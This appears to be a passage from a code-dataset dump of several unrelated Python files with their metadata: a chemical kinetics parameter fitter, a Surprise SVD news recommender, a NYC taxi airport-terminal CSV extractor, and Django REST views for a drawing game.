G.add_edge('Oil', 'Oil')\n\n fuel_set = set(fuel_names)\n for i in range(num_rxns):\n reac_fuels = list(fuel_set.intersection(set(reac_names[i])))\n prod_fuels = list(fuel_set.intersection(set(prod_names[i])))\n for f1 in reac_fuels:\n for f2 in prod_fuels:\n G.add_edge(f1, f2)\n \n # Get shortest path between Oil and fuels\n shortest_fuel_paths = {}\n for f in fuel_names:\n shortest_fuel_paths[f] = nx.shortest_path_length(G, source='Oil', target=f)\n \n reaction_path_lengths = {}\n for i, r in enumerate(reac_names):\n for s in r: # Note: relies on only one fuel per reaction\n if s in fuel_names:\n reaction_path_lengths[i] = shortest_fuel_paths[s]\n \n # Gather path lengths associated with each oxygen-containing reaction\n oxy_path_lengths = [reaction_path_lengths[i] for i in oxy_rxns]\n \n # Reaction index to nearest oxygen-containing reaction\n rounded_path_inds = [min(range(len(oxy_rxns)), key=lambda x: abs(reaction_path_lengths[i]-oxy_path_lengths[x])) for i in range(num_rxns)]\n \n # Compile pre-exponential factor and activation energy \n pre_exps_all = [pre_exp[rounded_path_inds[i]] for i in range(num_rxns)]\n act_engs_all = [act_engs[rounded_path_inds[i]] for i in range(num_rxns)]\n \n if log_params:\n pre_exps_all = [np.log(A) for A in pre_exps_all]\n act_engs_all = [np.log(E) for E in act_engs_all]\n\n bnds=[]\n for i, p in enumerate(param_types):\n if p[0] =='preexp':\n x0[i] = pre_exps_all[p[1]]\n bnds.append((-np.inf, np.inf))\n elif p[0] == 'acteng':\n x0[i] = act_engs_all[p[1]]\n bnds.append((-np.inf, np.inf))\n else:\n bnds.append((0, np.inf))\n \n # Find coefficients that minimize the residual (i.e. physical reaction)\n sol = minimize(res, x0, bounds=bnds)\n x0 = sol.x # assign initial guess as vector that creates physical reaction\n \n return x0", "repo_name": "suetri-a/ISC-Kinetics", "sub_path": "Kinetics-Model-Optimizer/data/rto_data.py", "file_name": "rto_data.py", "file_ext": "py", "file_size_in_byte": 15480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_excel", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 41, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 58, "usage_type": "call"}, {"api_name": "base_data.BaseData", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 157, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 245, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 253, "usage_type": "call"}, {"api_name": "sklearn.cluster.SpectralClustering", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 264, "usage_type": "call"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 345, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 367, "usage_type": "call"}, {"api_name": "networkx.shortest_path_length", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 408, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 411, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 413, "usage_type": "attribute"}, {"api_name": "scipy.optimize.minimize", "line_number": 416, "usage_type": "call"}]} +{"seq_id": "12883184273", "text": "#0. Packages import\nimport pandas as pd\nimport os\nimport math\nimport surprise\n\nfrom collections import defaultdict\n\nfrom surprise import Reader, Dataset\nfrom surprise import SVD, dump\n\n \n#1. Loading Metadata Dataset\nmeta_df= pd.read_csv(\"./news-portal-user-interactions-by-globocom/articles_metadata.csv\")\n\n\n#2. Loading and regrouping clicks files together\nif not os.path.exists('./news-portal-user-interactions-by-globocom/clicks_sum.csv'):\n file_dir = \"./news-portal-user-interactions-by-globocom/clicks\"\n file_path_list = sorted(\n [\n os.path.join(file_dir, file_name) \n for file_name in os.listdir(file_dir)\n if file_name.endswith(\".csv\")\n ]\n )\n \n file_df_list = []\n \n for file_path in file_path_list:\n df = pd.read_csv(file_path)\n file_df_list.append(df)\n \n clicks_sum = pd.concat(file_df_list, ignore_index=True)\n clicks_sum.to_csv('./news-portal-user-interactions-by-globocom/clicks_sum.csv')\nelse:\n clicks_sum= pd.read_csv('./news-portal-user-interactions-by-globocom/clicks_sum.csv')\n\n# 3. Filtering datas to the ones needed\nfiltered_data = clicks_sum.merge(meta_df,\n left_on='click_article_id',\n right_on='article_id')[[\"user_id\",\n \"article_id\",\n \"category_id\",\n \"session_size\"]]\n \n# Function to spread rating properly\ndef smooth_user_preference(x):\n return math.log(1+x, 2) \n \n#4. Applying Log function to the rating\nrating_cat_log = filtered_data.groupby([\"user_id\", \"article_id\"])[\"session_size\"].sum()\\\n .apply(smooth_user_preference).reset_index()\n\n#5. Using Surprise Package\n# Initializing Surprise reader\nreader = Reader(rating_scale=(1, 10))\n\n# Creating Surprise Dataset\ndata = Dataset.load_from_df(rating_cat_log[[\"user_id\", \"article_id\", \"session_size\"]],\n reader)\n\n# Split de Dataset in train and test sets\ntrainset, testset = surprise.model_selection.train_test_split(data, test_size=0.25, random_state=0)\n\n#5. Choose and train algorithm\n\n# Choose the prediction algorithm (matrix factorization SVD here)\nalgo_best = SVD(n_epochs= 20,lr_all=0.01, reg_all=0.4)\n\n# Fit algorithm\nalgo_best.fit(trainset)\n\n# Compute predictions of the 'original' algorithm.\npredictions = algo_best.test(testset)\n\n# Dump predictions for future use in API\nfile_name = os.path.expanduser(\"dump_file\") # create the dimp file if not existing\ndump.dump(\"dump_file\",\n predictions=predictions,\n )\n\nfile_name = os.path.expanduser(\"dump_file\")\nloaded_predictions, loaded_algo = dump.load(file_name)\n\n\n# Function from https://surprise.readthedocs.io/en/stable/FAQ.html\ndef get_top_n(predictions, n=5):\n \"\"\"Return the top-N recommendation for each user from a set of predictions.\n\n Args:\n predictions(list of Prediction objects): The list of predictions, as\n returned by the test method of an algorithm.\n n(int): The number of recommendation to output for each user. Default\n is 10.\n\n Returns:\n A dict where keys are user (raw) ids and values are lists of tuples:\n [(raw item id, rating estimation), ...] of size n.\n \"\"\"\n\n # First map the predictions to each user.\n top_n = defaultdict(list)\n \n for uid, iid, true_r, est, _ in predictions:\n top_n[uid].append((iid, est))\n\n # Then sort the predictions for each user and retrieve the k highest ones.\n for uid, user_ratings in top_n.items():\n user_ratings.sort(key=lambda x: x[1], reverse=True)\n top_n[uid] = user_ratings[:n]\n\n return top_n\n\n# Function to display the result. To be changed according to the API display\ndef recommend(user_id, num):\n print(\"Recommending \" + str(num) + \" articles to user \" + str(user_id) + \"...\") \n print(\"-------\")\n top_n = get_top_n(loaded_predictions, num) \n recs = top_n[user_id][:num] \n for rec in recs: \n print(\"Recommended: \" + str(rec[0]) + \" (score:\" + str(rec[1]) + \")\")\n\n# Testing out the script\n# recommend(10000,5)", "repo_name": "AmauryLecoq/Article_recommendation_app", "sub_path": "Script_model/collaborative_filtering.py", "file_name": "collaborative_filtering.py", "file_ext": "py", "file_size_in_byte": 4141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "math.log", "line_number": 49, "usage_type": "call"}, {"api_name": "surprise.Reader", "line_number": 57, "usage_type": "call"}, {"api_name": "surprise.Dataset.load_from_df", "line_number": 60, "usage_type": "call"}, {"api_name": "surprise.Dataset", "line_number": 60, "usage_type": "name"}, {"api_name": "surprise.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "surprise.model_selection", "line_number": 64, "usage_type": "attribute"}, {"api_name": "surprise.SVD", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "surprise.dump.dump", "line_number": 79, "usage_type": "call"}, {"api_name": "surprise.dump", "line_number": 79, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "surprise.dump.load", "line_number": 84, "usage_type": "call"}, {"api_name": "surprise.dump", "line_number": 84, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "25999220884", "text": "#!/usr/bin/env python\nimport glob\nimport csv\nfrom math import radians, cos, sin, asin, sqrt\nfrom datetime import datetime\n\nREAD_KEYS = (\n 'vendor_id', 'rate_code', 'pickup_datetime',\n 'trip_time_in_secs', 'passenger_count',\n 'pickup_longitude', 'pickup_latitude',\n 'dropoff_longitude', 'dropoff_latitude',\n)\n\nWRITE_KEYS = READ_KEYS + (\n 'terminal',\n)\n\nTERMINALS = (\n ('JFKT1', 100, 40.643190, -73.789867),\n ('JFKT23', 100, 40.641530, -73.787875),\n ('JFKT4', 100, 40.644429, -73.782924),\n ('JFKT5', 100, 40.645795, -73.776379),\n ('JFKT7', 100, 40.648586, -73.782909),\n ('JFKT8', 100, 40.646870, -73.789999),\n ('LGAA', 70, 40.773130, -73.885406),\n ('LGAB', 50, 40.774210, -73.872263),\n ('LGAC', 40, 40.771111, -73.865579),\n ('LGAD', 30, 40.768477, -73.862196),\n # ('EWR A', 100, 40.687819, -74.182653),\n # ('EWR B', 100, 40.690580, -74.177597),\n # ('EWR C', 100, 40.695255, -74.177720),\n)\n\n\ndef haversine(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n\n From: http://stackoverflow.com/q/4913349/438838\n \"\"\"\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n\n # 6367 km is the radius of the Earth\n meters = 6367 * 1000 * c\n return meters\n\n\ndef get_nearest(cab_data):\n pickup_lat = float(cab_data['pickup_latitude'])\n pickup_lng = float(cab_data['pickup_longitude'])\n nearest = min((haversine(pickup_lng, pickup_lat, lng, lat), terminal)\n for terminal, rng, lat, lng in TERMINALS)\n return {'terminal': nearest[1]}\n\n\ndef format_date(dt):\n date = datetime.strptime(dt, '%m/%d/%y %H:%M')\n return date.strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef extract_data(path):\n with open(path, 'r') as f:\n reader = csv.DictReader(f)\n for row in reader:\n data = {k: row[k] for k in READ_KEYS}\n data['pickup_datetime'] = format_date(data['pickup_datetime'])\n data.update(get_nearest(data))\n yield data\n\n\ndef process_csv_files():\n with open('data.csv', 'w+') as f:\n writer = csv.DictWriter(f, WRITE_KEYS)\n writer.writeheader()\n for path in glob.glob('csvs/*'):\n rows = extract_data(path)\n writer.writerows(rows)\n\n\nif __name__ == '__main__':\n process_csv_files()\n", "repo_name": "dheerosaur/nyc-holiday-taxi-viz", "sub_path": "bin/extract.py", "file_name": "extract.py", "file_ext": "py", "file_size_in_byte": 2567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "86", "api": [{"api_name": "math.radians", "line_number": 43, "usage_type": "argument"}, {"api_name": "math.sin", "line_number": 48, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 48, "usage_type": "call"}, {"api_name": "math.asin", "line_number": 49, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 71, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 81, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "12605406915", "text": "from django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets\nfrom drawsaurus.serializers import UserSerializer, GroupSerializer\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404\nfrom drawsaurus.models import Game, TypedTurn, DrawingTurn\nfrom drawsaurus.serializers import GameSerializer, TypedTurnSerializer, DrawingTurnSerializer\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework import mixins, generics\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass GameList(generics.ListCreateAPIView):\n \"\"\"\n List all games, or create a new game.\n \"\"\"\n queryset = Game.objects.all()\n serializer_class = GameSerializer\n\n\nclass GameDetail(generics.RetrieveDestroyAPIView):\n \"\"\"\n Retrieve or delete a game.\n \"\"\"\n queryset = Game.objects.all()\n serializer_class = GameSerializer\n\n@api_view(['GET'])\ndef typed_turns_for_game(request, game_pk):\n \"\"\"\n Returns the ordered list of all turns so far in a game.\n \"\"\"\n if request.method == 'GET':\n try:\n game = Game.objects.get(pk=game_pk)\n except Game.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n typed_turns = TypedTurn.objects.filter(game=game)\n typed_serializer = TypedTurnSerializer(typed_turns, many=True)\n return Response(typed_serializer.data)\n\n\n@api_view(['GET'])\ndef drawing_turns_for_game(request, game_pk):\n \"\"\"\n Returns the ordered list of all turns so far in a game.\n \"\"\"\n if request.method == 'GET':\n try:\n game = Game.objects.get(pk=game_pk)\n except Game.DoesNotExist:\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\n drawing_turns = DrawingTurn.objects.filter(game=game)\n drawing_serializer = DrawingTurnSerializer(drawing_turns, many=True)\n return Response(drawing_serializer.data)\n\n", "repo_name": "ChrisCooper/drawsaurus-server", "sub_path": "drawsaurus/views/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 2364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 19, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.UserSerializer", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 23, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 23, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 27, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.GroupSerializer", "line_number": 28, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 31, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 35, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.GameSerializer", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveDestroyAPIView", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 39, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.objects.all", "line_number": 43, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 43, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.GameSerializer", "line_number": 44, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.objects.get", "line_number": 53, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 53, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.DoesNotExist", "line_number": 54, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 54, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 55, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 55, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 55, "usage_type": "name"}, {"api_name": "drawsaurus.models.TypedTurn.objects.filter", "line_number": 56, "usage_type": "call"}, {"api_name": "drawsaurus.models.TypedTurn.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.TypedTurn", "line_number": 56, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.TypedTurnSerializer", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 58, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 46, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects.get", "line_number": 68, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 68, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.DoesNotExist", "line_number": 69, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 70, "usage_type": "name"}, {"api_name": "drawsaurus.models.DrawingTurn.objects.filter", "line_number": 71, "usage_type": "call"}, {"api_name": "drawsaurus.models.DrawingTurn.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.DrawingTurn", "line_number": 71, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.DrawingTurnSerializer", "line_number": 72, "usage_type": "call"}, {"api_name": 